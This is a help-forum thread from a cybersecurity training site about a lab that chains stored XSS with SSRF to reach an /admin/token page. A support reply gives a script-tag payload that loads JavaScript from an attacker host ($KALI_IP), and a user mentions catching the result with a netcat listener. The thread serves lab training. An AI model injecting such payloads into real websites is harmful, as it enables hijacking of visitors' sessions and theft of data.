Forum Discussion

Bronze I

10 months ago

Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

CyberSharpe
9 months ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.

ChrisKershaw

Community Support

10 months ago

Hey shubham

Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊.

I'll be happy to share a hint to help you with your lab attempt:

In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>

Will you see if this helps you with your attempt?

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Featured Places

Help & Support Forum

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Pen Test CTFs: Jinja2 Exploitation

Human Connection Challenge: Season 1 – Web Exploitation - XSS

Zeek Ep 4 Scripting

Fundamental AI Algorithms: Decision Trees Script Detection Question 6

Recent Discussions

Help with Introduction to Python Scripting: Ep.7 – Demonstrate Your Skills

Privilege Escalation: Windows – Finding Passwords

Microsoft Defender for Cloud: Inventory, Resource Health and Recommendations.

Malware Analysis: Shlayer

CSP Hash Incorrect Despite Correct Script and Hash (CSP Lab Issue?)